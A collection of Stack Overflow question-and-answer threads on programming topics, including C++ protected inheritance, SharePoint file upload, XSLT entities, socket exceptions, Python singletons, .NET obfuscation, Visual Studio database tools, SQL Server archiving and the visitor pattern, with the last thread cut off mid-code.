Q: Are there any examples where we *need* protected inheritance in C++? While I've seen rare cases where private inheritance was needed, I've never encountered a case where protected inheritance is needed. Does someone have an example? A: There is a very rare use case of protected inheritance. It is where you want to make use of covariance: struct base { virtual ~base() {} virtual base & getBase() = 0; }; struct d1 : private /* protected */ base { virtual base & getBase() { return this; } }; struct d2 : private /* protected */ d1 { virtual d1 & getBase () { return this; } }; The previous snippet tried to hide it's base class, and provide controlled visibility of bases and their functions, for whatever reason, by providing a "getBase" function. However, it will fail in struct d2, since d2 does not know that d1 is derived from base. Thus, covariance will not work. A way out of this is deriving them protected, so that the inheritance is visible in d2. A similar example of using this is when you derive from std::ostream, but don't want random people to write into your stream. You can provide a virtual getStream function that returns std::ostream&. That function could do some preparing of the stream for the next operation. For example putting certain manipulators in. std::ostream& d2::getStream() { this->width(10); return *this; } logger.getStream() << "we are padded"; A: People here seem to mistake Protected class inheritance and Protected methods. FWIW, I've never seen anyone use protected class inheritance, and if I remember correctly I think Stroustrup even considered the "protected" level to be a mistake in c++. There's precious little you cannot do if you remove that protection level and only rely on public and private. A: C++ FAQ Lite mentions of a case where using private inheritance is a legitimate solution (See [24.3.] Which should I prefer: composition or private inheritance?). It's when you want to call the derived class from within a private base class through a virtual function (in this case derivedFunction()): class SomeImplementationClass { protected: void service() { derivedFunction(); } virtual void derivedFunction() = 0; // virtual destructor etc }; class Derived : private SomeImplementationClass { void someFunction() { service(); } virtual void derivedFunction() { // ... } // ... }; Now if you want to derive from the class Derived, and you want to use Base::service() from within the derived class (say you want to move Derived::someFunction() to the derived class), the easiest way to accomplish this is to change the private inheritance of Base to protected inheritance. Sorry, can't think of a more concrete example. Personally I like to make all inheritance public so as to avoid wasting time with "should I make inheritance relation protected or private" discussions.
{ "language": "en", "url": "https://stackoverflow.com/questions/31867", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "14" }
Q: Upload a file to SharePoint through the built-in web services What is the best way to upload a file to a Document Library on a SharePoint server through the built-in web services that version WSS 3.0 exposes? Following the two initial answers... * *We definitely need to use the Web Service layer as we will be making these calls from remote client applications. *The WebDAV method would work for us, but we would prefer to be consistent with the web service integration method. There is additionally a web service to upload files, painful but works all the time. Are you referring to the “Copy” service? We have been successful with this service’s CopyIntoItems method. Would this be the recommended way to upload a file to Document Libraries using only the WSS web service API? I have posted our code as a suggested answer. A: Another option is to use plain ol' HTTP PUT: WebClient webclient = new WebClient(); webclient.Credentials = new NetworkCredential(_userName, _password, _domain); webclient.UploadFile(remoteFileURL, "PUT", FilePath); webclient.Dispose(); Where remoteFileURL points to your SharePoint document library... A: There are a couple of things to consider: * *Copy.CopyIntoItems needs the document to be already present at some server. The document is passed as a parameter of the webservice call, which will limit how large the document can be. (See http://social.msdn.microsoft.com/Forums/en-AU/sharepointdevelopment/thread/e4e00092-b312-4d4c-a0d2-1cfc2beb9a6c) *the 'http put' method (ie webdav...) will only put the document in the library, but not set field values *to update field values you can call Lists.UpdateListItem after the 'http put' *document libraries can have directories, you can make them with 'http mkcol' *you may want to check in files with Lists.CheckInFile *you can also create a custom webservice that uses the SPxxx .Net API, but that new webservice will have to be installed on the server. It could save trips to the server. A: public static void UploadFile(byte[] fileData) { var copy = new Copy { Url = "http://servername/sitename/_vti_bin/copy.asmx", UseDefaultCredentials = true }; string destinationUrl = "http://servername/sitename/doclibrary/filename"; string[] destinationUrls = {destinationUrl}; var info1 = new FieldInformation { DisplayName = "Title", InternalName = "Title", Type = FieldType.Text, Value = "New Title" }; FieldInformation[] info = {info1}; var copyResult = new CopyResult(); CopyResult[] copyResults = {copyResult}; copy.CopyIntoItems( destinationUrl, destinationUrls, info, fileData, out copyResults); } NOTE: Changing the 1st parameter of CopyIntoItems to the file name, Path.GetFileName(destinationUrl), makes the unlink message disappear. A: I've had good luck using the DocLibHelper wrapper class described here: http://geek.hubkey.com/2007/10/upload-file-to-sharepoint-document.html A: Example of using the WSS "Copy" Web service to upload a document to a library... public static void UploadFile2007(string destinationUrl, byte[] fileData) { // List of desination Urls, Just one in this example. string[] destinationUrls = { Uri.EscapeUriString(destinationUrl) }; // Empty Field Information. This can be populated but not for this example. SharePoint2007CopyService.FieldInformation information = new SharePoint2007CopyService.FieldInformation(); SharePoint2007CopyService.FieldInformation[] info = { information }; // To receive the result Xml. SharePoint2007CopyService.CopyResult[] result; // Create the Copy web service instance configured from the web.config file. SharePoint2007CopyService.CopySoapClient CopyService2007 = new CopySoapClient("CopySoap"); CopyService2007.ClientCredentials.Windows.ClientCredential = CredentialCache.DefaultNetworkCredentials; CopyService2007.ClientCredentials.Windows.AllowedImpersonationLevel = System.Security.Principal.TokenImpersonationLevel.Delegation; CopyService2007.CopyIntoItems(destinationUrl, destinationUrls, info, fileData, out result); if (result[0].ErrorCode != SharePoint2007CopyService.CopyErrorCode.Success) { // ... } } A: From a colleage at work: Lazy way: your Windows WebDAV filesystem interface. It is bad as a programmatic solution because it relies on the WindowsClient service running on your OS, and also only works on websites running on port 80. Map a drive to the document library and get with the file copying. There is additionally a web service to upload files, painful but works all the time. I believe you are able to upload files via the FrontPage API but I don’t know of anyone who actually uses it. A: Not sure on exactly which web service to use, but if you are in a position where you can use the SharePoint .NET API Dlls, then using the SPList and SPLibrary.Items.Add is really easy.
{ "language": "en", "url": "https://stackoverflow.com/questions/31868", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "31" }
Q: Using an HTML entity in XSLT (e.g.  ) What is the best way to include an html entity in XSLT? <xsl:template match="/a/node"> <xsl:value-of select="."/> <xsl:text>&nbsp;</xsl:text> </xsl:template> this one returns a XsltParseError A: this one returns a XsltParseError Yes, and the reason for that is that &nbsp; is not a predefined entity in XML or XSLT as it is in HTML. You could just use the unicode character which &nbsp; stands for: &#160; A: XSLT only handles the five basic entities by default: lt, gt, apos, quot, and amp. All others need to be defined as @Aku mentions. A: Now that there's Unicode, it's generally counter-productive to use named character entities. I would recommend using the Unicode character for a non-breaking space instead of an entity, just for that reason. Alternatively, you could use the entity &#160;, instead of the named entity. Using named entities makes your XML dependent on an inline or external DTD. A: It is also possible to extend the approach from 2nd part of aku's answer and get all known character references available, like this: <!DOCTYPE stylesheet [ <!ENTITY % w3centities-f PUBLIC "-//W3C//ENTITIES Combined Set//EN//XML" "http://www.w3.org/2003/entities/2007/w3centities-f.ent"> %w3centities-f; ]> ... <xsl:text>&nbsp;&minus;30&deg;</xsl:text> There is certain difference in the result as compared to <xsl:text disable-output-escaping="yes"> approach. The latter one is going to produce string literals like &nbsp; for all kinds of output, even for <xsl:output method="text">, and this may happen to be different from what you might wish... On the contrary, getting entities defined for XSLT template via <!DOCTYPE ... <!ENTITY ... will always produce output consistent with your xsl:output settings. It may be wise then to use a local entity resolver to keep the XSLT engine from fetching character entity definitions from the Internet. JAXP or explicit Xalan-J users may need a patch for Xalan-J to use the resolver correctly. See my blog XSLT, entities, Java, Xalan... for patch download and comments. A: one other possibility to use html entities from within xslt is the following one: <xsl:text disable-output-escaping="yes">&amp;nbsp;</xsl:text> A: You can use CDATA section <xsl:text disable-output-escaping="yes"><![CDATA[&nbsp;]]></xsl:text> or you can describe &nbsp in local DTD: <!DOCTYPE xsl:stylesheet [ <!ENTITY nbsp "&#160;"> ]> or just use &#160; instead of &nbsp; A: I found all of these solutions produced a  character in the blank space. Using <xsl:text> </xsl:text> solved the problem for me; but <xsl:text>#x20;</xsl:text> might work as well. A: Thank you for your information. I have written a short blog post based on what worked for me as I was doing XSLT transformation in a template of the Dynamicweb CMS. The blog post is here: How to add entities to XSLT templates. /Sten Hougaard A: It is necessary to use the entity #x160; A: I had no luck with the DOCTYPE approach from Aku. What worked for me in MSXML transforms on an Windows 2003 server, was <xsl:text disable-output-escaping="yes">&amp;#160;</xsl:text> Sort of a hybrid of the above. Thanks Stackoverflow contributors! A: One space character between text tags should be enough.
{ "language": "en", "url": "https://stackoverflow.com/questions/31870", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "67" }
Q: WSACancelBlockingCall exception Ok, I have a strange exception thrown from my code that's been bothering me for ages. System.Net.Sockets.SocketException: A blocking operation was interrupted by a call to WSACancelBlockingCall at System.Net.Sockets.Socket.Accept() at System.Net.Sockets.TcpListener.AcceptTcpClient() MSDN isn't terribly helpful on this : http://msdn.microsoft.com/en-us/library/ms741547(VS.85).aspx and I don't even know how to begin troubleshooting this one. It's only thrown 4 or 5 times a day, and never in our test environment. Only in production sites, and on ALL production sites. I've found plenty of posts asking about this exception, but no actual definitive answers on what is causing it, and how to handle or prevent it. The code runs in a separate background thread, the method starts : public virtual void Startup() { TcpListener serverSocket= new TcpListener(new IPEndPoint(bindAddress, port)); serverSocket.Start(); then I run a loop putting all new connections as jobs in a separate thread pool. It gets more complicated because of the app architecture, but basically: while (( socket = serverSocket.AcceptTcpClient()) !=null) //Funny exception here { connectionHandler = new ConnectionHandler(socket, mappingStrategy); pool.AddJob(connectionHandler); } } From there, the pool has it's own threads that take care of each job in it's own thread, separately. My understanding is that AcceptTcpClient() is a blocking call, and that somehow winsock is telling the thread to stop blocking and continue execution.. but why? And what am I supposed to do? Just catch the exception and ignore it? Well, I do think some other thread is closing the socket, but it's certainly not from my code. What I would like to know is: is this socket closed by the connecting client (on the other side of the socket) or is it closed by my server. Because as it is at this moment, whenever this exception occurs, it shutsdown my listening port, effectively closing my service. If this is done from a remote location, then it's a major problem. Alternatively, could this be simply the IIS server shutting down my application, and thus cancelling all my background threads and blocking methods? A: This is my example solution to avoid WSAcancelblablabla: Define your thread as global then you can use invoke method like this: private void closinginvoker(string dummy) { if (InvokeRequired) { this.Invoke(new Action<string>(closinginvoker), new object[] { dummy }); return; } t_listen.Abort(); client_flag = true; c_idle.Close(); listener1.Stop(); } After you invoke it, close the thread first then the forever loop flag so it block further waiting (if you have it), then close tcpclient then stop the listener. A: This could happen on a serverSocket.Stop(). Which I called whenever Dispose was called. Here is how my exception handling for the listen thread looked like: try { //... } catch (SocketException socketEx) { if (_disposed) ar.SetAsCompleted(null, false); //exception because listener stopped (disposed), ignore exception else ar.SetAsCompleted(socketEx, false); } Now what happened was, every so often the exception would occur before _disposed was set to true. So the solution for me was to make everything thread safe. A: Is it possible that the serverSocket is being closed from another thread? That will cause this exception. A: Same here! But i figured out, that the ReceiveBuffer on 'server-side' was flooded from the clients! (In my case a bunch of RFID-Scanners, who kept spamming the TagCode, instead of stop sending until next TagCode arrives) It helped to raise the ReceiveBuffers and reconfigure the scanners... A: More recently I saw this exception when using HttpWebRequest to PUT a large file and the Timeout period was passed. Using the following code as long as your upload time > 3 seconds it will cause this error as far as I could see. string path = "Reasonably large file.dat"; int bufferSize = 1024; byte[] buffer = new byte[bufferSize]; System.Net.HttpWebRequest req = (HttpWebRequest)System.Net.HttpWebRequest.Create("Some URL"); req.Method = "PUT"; req.Timeout = 3000; //3 seconds, small timeout to demonstrate long length = new System.IO.FileInfo(path).Length; using (FileStream input = File.OpenRead(path)) { using (Stream output = req.GetRequestStream()) { long remaining = length; int bytesRead = 0; while ((bytesRead = input.Read(buffer, 0, (int)Math.Min(remaining, (decimal)bufferSize))) > 0) { output.Write(buffer, 0, bytesRead); remaining -= bytesRead; } output.Close(); } input.Close(); }
{ "language": "en", "url": "https://stackoverflow.com/questions/31871", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "54" }
Q: Is there a simple, elegant way to define singletons? There seem to be many ways to define singletons in Python. Is there a consensus opinion on Stack Overflow? A: The module approach works well. If I absolutely need a singleton I prefer the Metaclass approach. class Singleton(type): def __init__(cls, name, bases, dict): super(Singleton, cls).__init__(name, bases, dict) cls.instance = None def __call__(cls,*args,**kw): if cls.instance is None: cls.instance = super(Singleton, cls).__call__(*args, **kw) return cls.instance class MyClass(object): __metaclass__ = Singleton A: There are also some interesting articles on the Google Testing blog, discussing why singleton are/may be bad and are an anti-pattern: * *Singletons are Pathological Liars *Where Have All the Singletons Gone? *Root Cause of Singletons A: I think that forcing a class or an instance to be a singleton is overkill. Personally, I like to define a normal instantiable class, a semi-private reference, and a simple factory function. class NothingSpecial: pass _the_one_and_only = None def TheOneAndOnly(): global _the_one_and_only if not _the_one_and_only: _the_one_and_only = NothingSpecial() return _the_one_and_only Or if there is no issue with instantiating when the module is first imported: class NothingSpecial: pass THE_ONE_AND_ONLY = NothingSpecial() That way you can write tests against fresh instances without side effects, and there is no need for sprinkling the module with global statements, and if needed you can derive variants in the future. A: See this implementation from PEP318, implementing the singleton pattern with a decorator: def singleton(cls): instances = {} def getinstance(): if cls not in instances: instances[cls] = cls() return instances[cls] return getinstance @singleton class MyClass: ... A: I don't really see the need, as a module with functions (and not a class) would serve well as a singleton. All its variables would be bound to the module, which could not be instantiated repeatedly anyway. If you do wish to use a class, there is no way of creating private classes or private constructors in Python, so you can't protect against multiple instantiations, other than just via convention in use of your API. I would still just put methods in a module, and consider the module as the singleton. A: The Python documentation does cover this: class Singleton(object): def __new__(cls, *args, **kwds): it = cls.__dict__.get("__it__") if it is not None: return it cls.__it__ = it = object.__new__(cls) it.init(*args, **kwds) return it def init(self, *args, **kwds): pass I would probably rewrite it to look more like this: class Singleton(object): """Use to create a singleton""" def __new__(cls, *args, **kwds): """ >>> s = Singleton() >>> p = Singleton() >>> id(s) == id(p) True """ it_id = "__it__" # getattr will dip into base classes, so __dict__ must be used it = cls.__dict__.get(it_id, None) if it is not None: return it it = object.__new__(cls) setattr(cls, it_id, it) it.init(*args, **kwds) return it def init(self, *args, **kwds): pass class A(Singleton): pass class B(Singleton): pass class C(A): pass assert A() is A() assert B() is B() assert C() is C() assert A() is not B() assert C() is not B() assert C() is not A() It should be relatively clean to extend this: class Bus(Singleton): def init(self, label=None, *args, **kwds): self.label = label self.channels = [Channel("system"), Channel("app")] ... A: Here's my own implementation of singletons. All you have to do is decorate the class; to get the singleton, you then have to use the Instance method. Here's an example: @Singleton class Foo: def __init__(self): print 'Foo created' f = Foo() # Error, this isn't how you get the instance of a singleton f = Foo.instance() # Good. Being explicit is in line with the Python Zen g = Foo.instance() # Returns already created instance print f is g # True And here's the code: class Singleton: """ A non-thread-safe helper class to ease implementing singletons. This should be used as a decorator -- not a metaclass -- to the class that should be a singleton. The decorated class can define one `__init__` function that takes only the `self` argument. Also, the decorated class cannot be inherited from. Other than that, there are no restrictions that apply to the decorated class. To get the singleton instance, use the `instance` method. Trying to use `__call__` will result in a `TypeError` being raised. """ def __init__(self, decorated): self._decorated = decorated def instance(self): """ Returns the singleton instance. Upon its first call, it creates a new instance of the decorated class and calls its `__init__` method. On all subsequent calls, the already created instance is returned. """ try: return self._instance except AttributeError: self._instance = self._decorated() return self._instance def __call__(self): raise TypeError('Singletons must be accessed through `instance()`.') def __instancecheck__(self, inst): return isinstance(inst, self._decorated) A: The Singleton Pattern implemented with Python courtesy of ActiveState. It looks like the trick is to put the class that's supposed to only have one instance inside of another class. A: class Singleton(object[,...]): staticVar1 = None staticVar2 = None def __init__(self): if self.__class__.staticVar1==None : # create class instance variable for instantiation of class # assign class instance variable values to class static variables else: # assign class static variable values to class instance variables A: OK, singleton could be good or evil, I know. This is my implementation, and I simply extend a classic approach to introduce a cache inside and produce many instances of a different type or, many instances of same type, but with different arguments. I called it Singleton_group, because it groups similar instances together and prevent that an object of the same class, with same arguments, could be created: # Peppelinux's cached singleton class Singleton_group(object): __instances_args_dict = {} def __new__(cls, *args, **kwargs): if not cls.__instances_args_dict.get((cls.__name__, args, str(kwargs))): cls.__instances_args_dict[(cls.__name__, args, str(kwargs))] = super(Singleton_group, cls).__new__(cls, *args, **kwargs) return cls.__instances_args_dict.get((cls.__name__, args, str(kwargs))) # It's a dummy real world use example: class test(Singleton_group): def __init__(self, salute): self.salute = salute a = test('bye') b = test('hi') c = test('bye') d = test('hi') e = test('goodbye') f = test('goodbye') id(a) 3070148780L id(b) 3070148908L id(c) 3070148780L b == d True b._Singleton_group__instances_args_dict {('test', ('bye',), '{}'): <__main__.test object at 0xb6fec0ac>, ('test', ('goodbye',), '{}'): <__main__.test object at 0xb6fec32c>, ('test', ('hi',), '{}'): <__main__.test object at 0xb6fec12c>} Every object carries the singleton cache... This could be evil, but it works great for some :) A: class Singeltone(type): instances = dict() def __call__(cls, *args, **kwargs): if cls.__name__ not in Singeltone.instances: Singeltone.instances[cls.__name__] = type.__call__(cls, *args, **kwargs) return Singeltone.instances[cls.__name__] class Test(object): __metaclass__ = Singeltone inst0 = Test() inst1 = Test() print(id(inst1) == id(inst0)) A: As the accepted answer says, the most idiomatic way is to just use a module. With that in mind, here's a proof of concept: def singleton(cls): obj = cls() # Always return the same object cls.__new__ = staticmethod(lambda cls: obj) # Disable __init__ try: del cls.__init__ except AttributeError: pass return cls See the Python data model for more details on __new__. Example: @singleton class Duck(object): pass if Duck() is Duck(): print "It works!" else: print "It doesn't work!" Notes: * *You have to use new-style classes (derive from object) for this. *The singleton is initialized when it is defined, rather than the first time it's used. *This is just a toy example. I've never actually used this in production code, and don't plan to. A: I'm very unsure about this, but my project uses 'convention singletons' (not enforced singletons), that is, if I have a class called DataController, I define this in the same module: _data_controller = None def GetDataController(): global _data_controller if _data_controller is None: _data_controller = DataController() return _data_controller It is not elegant, since it's a full six lines. But all my singletons use this pattern, and it's at least very explicit (which is pythonic). A: You can override the __new__ method like this: class Singleton(object): _instance = None def __new__(cls, *args, **kwargs): if not cls._instance: cls._instance = super(Singleton, cls).__new__( cls, *args, **kwargs) return cls._instance if __name__ == '__main__': s1 = Singleton() s2 = Singleton() if (id(s1) == id(s2)): print "Same" else: print "Different" A: Being relatively new to Python I'm not sure what the most common idiom is, but the simplest thing I can think of is just using a module instead of a class. What would have been instance methods on your class become just functions in the module and any data just becomes variables in the module instead of members of the class. I suspect this is the pythonic approach to solving the type of problem that people use singletons for. If you really want a singleton class, there's a reasonable implementation described on the first hit on Google for "Python singleton", specifically: class Singleton: __single = None def __init__( self ): if Singleton.__single: raise Singleton.__single Singleton.__single = self That seems to do the trick. A: My simple solution which is based on the default value of function parameters. def getSystemContext(contextObjList=[]): if len( contextObjList ) == 0: contextObjList.append( Context() ) pass return contextObjList[0] class Context(object): # Anything you want here A: Singleton's half brother I completely agree with staale and I leave here a sample of creating a singleton half brother: class void:pass a = void(); a.__class__ = Singleton a will report now as being of the same class as singleton even if it does not look like it. So singletons using complicated classes end up depending on we don't mess much with them. Being so, we can have the same effect and use simpler things like a variable or a module. Still, if we want use classes for clarity and because in Python a class is an object, so we already have the object (not and instance, but it will do just like). class Singleton: def __new__(cls): raise AssertionError # Singletons can't have instances There we have a nice assertion error if we try to create an instance, and we can store on derivations static members and make changes to them at runtime (I love Python). This object is as good as other about half brothers (you still can create them if you wish), however it will tend to run faster due to simplicity. A: The one time I wrote a singleton in Python I used a class where all the member functions had the classmethod decorator. class Foo: x = 1 @classmethod def increment(cls, y=1): cls.x += y A: Creating a singleton decorator (aka an annotation) is an elegant way if you want to decorate (annotate) classes going forward. Then you just put @singleton before your class definition. def singleton(cls): instances = {} def getinstance(): if cls not in instances: instances[cls] = cls() return instances[cls] return getinstance @singleton class MyClass: ... A: A slightly different approach to implement the singleton in Python is the borg pattern by Alex Martelli (Google employee and Python genius). class Borg: __shared_state = {} def __init__(self): self.__dict__ = self.__shared_state So instead of forcing all instances to have the same identity, they share state. A: In cases where you don't want the metaclass-based solution above, and you don't like the simple function decorator-based approach (e.g. because in that case static methods on the singleton class won't work), this compromise works: class singleton(object): """Singleton decorator.""" def __init__(self, cls): self.__dict__['cls'] = cls instances = {} def __call__(self): if self.cls not in self.instances: self.instances[self.cls] = self.cls() return self.instances[self.cls] def __getattr__(self, attr): return getattr(self.__dict__['cls'], attr) def __setattr__(self, attr, value): return setattr(self.__dict__['cls'], attr, value)
{ "language": "en", "url": "https://stackoverflow.com/questions/31875", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "520" }
Q: (Why) should I use obfuscation? It seems to me obfuscation is an idea that falls somewhere in the "security by obscurity" or "false sense of protection" camp. To protect intellectual property, there's copyright; to prevent security issues from being found, there's fixing those issues. In short, I regard it as a technical solution to a social problem. Those almost never work. However, I seem to be the only one in our dev team to feel that way, so I'm either wrong, or just need convincing arguments. Our product uses .NET, and one dev suggested .NET Reactor (which, incidentally, was suggested in this SO thread as well). .NET Reactor completely stops any decompiling by mixing any pure .NET assembly (written in C#, VB.NET, Delphi.NET, J#, MSIL...) with native machine code. So, basically, you throw all advantages of bytecode away in one go? Are there good engineering benefits to obfuscation? A: If a big team of programmers really want to get at your source code and that had the time, money and effort, then they would be successful. Obfuscation, therefore, should stop people who don't have the time, money or effort to get your source, passers by you might call them. A: If you stick to pure managed code obfuscation, you can shave off quite a bit of an assembly size, and obfuscated classes/function names (collapsed to single letters) mean smaller memory footprint. This is almost always negligible, but does have an impact (and is used) on some mobile/embedded devices (though mostly in java). A: One potential engineering benefit is that in some cases obfuscation can create smaller executables or other artifacts -- e.g. obfuscating javascript results in smaller files (because all of the variables are named "a" and "b" instead of "descriptiveNameOne" and all the whitespace is stripped, etc). This results in faster load times for the web pages that use obfuscated javascript. Obviously this doesn't apply (as much) in the .NET world, but it's an example of a situation in which there is an direct engineering benefit. A: While not related to .net, I would consider obfuscation in Javascript, and possibly other interpeted languages. Javascript benefits well from obfuscation because it reduces the bandwith needed, and the tokens the parser has to read. But obfuscating compiled bytecode doesn't really seem that usefull to me. I mean what would you try and achieve? I can only see obfuscation beeing slightly usefull in license checking code to avoid it beeing circumvented too easily. A: The main reason to use obfuscation is to protect intellectual property as you have indicated. It is generally much more cost effective to a business to purchase an obfuscation product like .NET Reactor than it is to try and legally enforce your copyrights. Obfuscation can also provide other more incidental benefits such as performance improvements and assembly size reduction. These would the engineering benefits you are looking for. A: I posted a question which might help you as it discusses some of the issues: should-i-be-worried-about-obfuscating-my-net-code A: You asked for engineering reasons, so this is not strictly speaking an answer to the question. But I think it's a valid clarification. As you say, obfuscation is intended to address a social problem. And social (or business) problems, unlike technical ones, rarely have a complete solution. There are only degrees of success in addressing or minimising the problem. In this case, obfuscation will raise the barriers to someone decompiling and stealing your code. It will discourage casual attacks and, through inertia, may make your intellectual property less likely to be stolen. To make a tiresome analogy, an immobiliser doesn't prevent your car being stolen, but it will make it less likely. Of course there is a cost, in maintainability, (possibly) in performance and most importantly in making it harder for users to accurately submit bug reports. As GateKiller said, obfuscation won't prevent a determined team from decompiling, but (and it depends what your product is) how determined a team is likely to be attacking you? So, this is not a technical solution to a social problem, it's a technical decision which adds one influence to a complex social structure. A: Use encryption to protect information on the way. Use obfuscation to protect information while your program still has it.
{ "language": "en", "url": "https://stackoverflow.com/questions/31882", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "8" }
Q: Does Visual Studio Server Explorer support custom database providers? I had used Server Explorer and related tools for graphical database development with Microsoft SQL Server in some of my learning projects - and it was a great experience. However, in my work I deal with Oracle DB and SQLite and my hobby projects use MySQL (because they are hosted on Linux). Is there a way to leverage the database-related tools in Visual Studio with other database providers? A: Here is instructions on how to connect to your MySQL database from Visual Studio: To make the connection in server explorer you need to do the following: * *first of all you need to install the MyODBC connector 3.51 (or latest) on the development machine (NB. you can find this at http://www.mysql.com/products/connector/odbc/ ) *Create a datasource in Control Panel/Administrative Tools with a connection to your database. This data source is going to be used purely for Server Manager and you dont need to worry about creating the same data source on your clients PC when you have made your VS.NET application (Unless you want to) - I dont want to cover this in this answer, too long. For the purpose of this explanation I will pretend that you created a MyODBC data source called 'AADSN' to database 'noddy' on mysqlserver 'SERVER01' and have a root password of 'fred'. The server can be either the Computer Name (found in Control Panel/System/Computer Name), or alternatively it can be the IP Address. NB. Make sure that you test this connection before continuing with this explanation. *open your VS.NET project *go to server explorer *right-click on 'Data Connections' *select 'Add Connection' *In DataLink Properties, go to the provider tab and select "Microsoft OLE DB Provider For ODBC drivers" *Click Next *If you previously created an ODBC data source then you could just select that. The disadvantage of this is that when you install your project application on the client machine, the same data source needs to be there. I prefer to use a connection string. This should look something like: DSN=AADSN;DESC=MySQL ODBC 3.51 Driver DSN;DATABASE=noddy;SERVER=SERVER01;UID=root;PASSWORD=fred;PORT=3306;SOCKET=;OPTION=11;STMT=; If you omit the password from the connection string then you must make sure that the datasource you created (AADSN) contains a password. I am not going to describe what these mean, you can look in the documentation for myodbc for that, just ensure that you get a "Connection Succeeded" message when you test the datasource. A: I found this during my research on Sqlite. I haven't had the chance to use it though. Let us know if this works for you. http://sqlite.phxsoftware.com/ System.Data.SQLite System.Data.SQLite is the original SQLite database engine and a complete ADO.NET 2.0 provider all rolled into a single mixed mode assembly. ... Visual Studio 2005/2008 Design-Time Support You can add a SQLite connection to the Server Explorer, create queries with the query designer, drag-and-drop tables onto a Typed DataSet and more! SQLite's designer works on full editions of Visual Studio 2005/2008, including VS2005 Express Editions. NEW You can create/edit views, tables, indexes, foreign keys, constraints and triggers interactively within the Visual Studio Server Explorer! A: The Server Explorer should support any database system that provides an ODBC driver. In the case of Oracle there is a built in driver with Visual Studio. In the Add Connection Dialog click the change button on the data source you should then get a list of the providers you have drivers for. A: Oracle has a set of tools that integrates with Visual Studio. It's packaged with their data access libraries. http://www.oracle.com/technology/software/tech/windows/odpnet/index.html
{ "language": "en", "url": "https://stackoverflow.com/questions/31885", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "13" }
Q: How to efficiently archive older parts of a big (multi-GB) SQL Server database? Right now I am working on a solution to archive older data from a big working database to a separate archive database with the same schema. I move the data using SQL scripts and SQL Server Management Objects (SMO) from a .Net executable written in C#. The archived data should still be accessible and even (occassionally) changeable, we just want it out of the way to keep the working database lean and fast. Hurling large portions of data around and managing the relations between tables has proven to be quite a challenge. I wonder if there is a better way to archive data with SQL Server. Any ideas? A: I think if you still want/need the data to be accessible, then partitioning some of your biggest or most-used tables could be an option. A: Yep, use table and index partitioning with filegroups. You don't even have to change the select statements, only if you want to get the last bit of speed out of the result. Another option can be the workload balancing with two servers and two way replication between them. A: We are in a similar situation. For regulatory reasons we cannot delete data for a set period of time, but many of our tables grow very large and unwieldy and realistically much of the data that is older than a month can be removed with few day-to-day problems. We currently programatically prune the tables, using a custom .NET/shell combination app using BCP to backup files which can be zipped and left on an out of the way network share. This isn't particularly accessible, but it is more space efficient. (It is complicated by our needing to keep certain historic dates, rather than being able to truncate at a certain size or with key fields in certain ranges.) We are looking into alternatives but, I think surprisingly, there's not much in the way of best-practice on this discussion!
{ "language": "en", "url": "https://stackoverflow.com/questions/31906", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "5" }
Q: A more generic visitor pattern I'm sorry if my question is so long and technical but I think it's so important other people will be interested about it I was looking for a way to separate clearly some softwares internals from their representation in c++ I have a generic parameter class (to be later stored in a container) that can contain any kind of value with the the boost::any class I have a base class (roughly) of this kind (of course there is more stuff) class Parameter { public: Parameter() template typename<T> T GetValue() const { return any_cast<T>( _value ); } template typename<T> void SetValue(const T& value) { _value = value; } string GetValueAsString() const = 0; void SetValueFromString(const string& str) const = 0; private: boost::any _value; } There are two levels of derived classes: The first level defines the type and the conversion to/from string (for example ParameterInt or ParameterString) The second level defines the behaviour and the real creators (for example deriving ParameterAnyInt and ParameterLimitedInt from ParameterInt or ParameterFilename from GenericString) Depending on the real type I would like to add external function or classes that operates depending on the specific parameter type without adding virtual methods to the base class and without doing strange casts For example I would like to create the proper gui controls depending on parameter types: Widget* CreateWidget(const Parameter& p) Of course I cannot understand real Parameter type from this unless I use RTTI or implement it my self (with enum and switch case), but this is not the right OOP design solution, you know. The classical solution is the Visitor design pattern http://en.wikipedia.org/wiki/Visitor_pattern The problem with this pattern is that I have to know in advance which derived types will be implemented, so (putting together what is written in wikipedia and my code) we'll have sort of: struct Visitor { virtual void visit(ParameterLimitedInt& wheel) = 0; virtual void visit(ParameterAnyInt& engine) = 0; virtual void visit(ParameterFilename& body) = 0; }; Is there any solution to obtain this behaviour in any other way without need to know in advance all the concrete types and without deriving the original visitor? Edit: Dr. Pizza's solution seems the closest to what I was thinking, but the problem is still the same and the method is actually relying on dynamic_cast, that I was trying to avoid as a kind of (even if weak) RTTI method Maybe it is better to think to some solution without even citing the visitor Pattern and clean our mind. The purpose is just having the function such: Widget* CreateWidget(const Parameter& p) behave differently for each "concrete" parameter without losing info on its type A: For a generic implementation of Vistor, I'd suggest the Loki Visitor, part of the Loki library. A: I've used this ("acyclic visitor") to good effect; it makes adding new classes to the hierarchy possible without changing existing ones, to some extent. A: If I understand this correctly... We had a object that could use different hardware options. To facilitate this we used a abstract interface of Device. Device had a bunch of functions that would be fired on certain events. The use would be the same but the various implementations of the Device would either have a fully-fleshed out functions or just return immediately. To make life even easier, the functions were void and threw exceptions on when something went wrong. A: For completeness's sake: it's of course completely possible to write an own implementation of a multimethod pointer table for your objects and calculate the method addresses manually at run time. There's a paper by Stroustrup on the topic of implementing multimethods (albeit in the compiler). I wouldn't really advise anyone to do this. Getting the implementation to perform well is quite complicated and the syntax for using it will probably be very awkward and error-prone. If everything else fails, this might still be the way to go, though. A: I am having trouble understanding your requirements. But Ill state - in my own words as it were - what I understand the situation to be: * *You have abstract Parameter class, which is subclassed eventually to some concrete classes (eg: ParameterLimitedInt). *You have a seperate GUI system which will be passed these parameters in a generic fashion, but the catch is that it needs to present the GUI component specific to the concrete type of the parameter class. *The restrictions are that you dont want to do RTTID, and dont want to write code to handle every possible type of concrete parameter. *You are open to using the visitor pattern. With those being your requirements, here is how I would handle such a situation: I would implement the visitor pattern where the accept() returns a boolean value. The base Parameter class would implement a virtual accept() function and return false. Concrete implementations of the Parameter class would then contain accept() functions which will call the visitor's visit(). They would return true. The visitor class would make use of a templated visit() function so you would only override for the concrete Parameter types you care to support: class Visitor { public: template< class T > void visit( const T& param ) const { 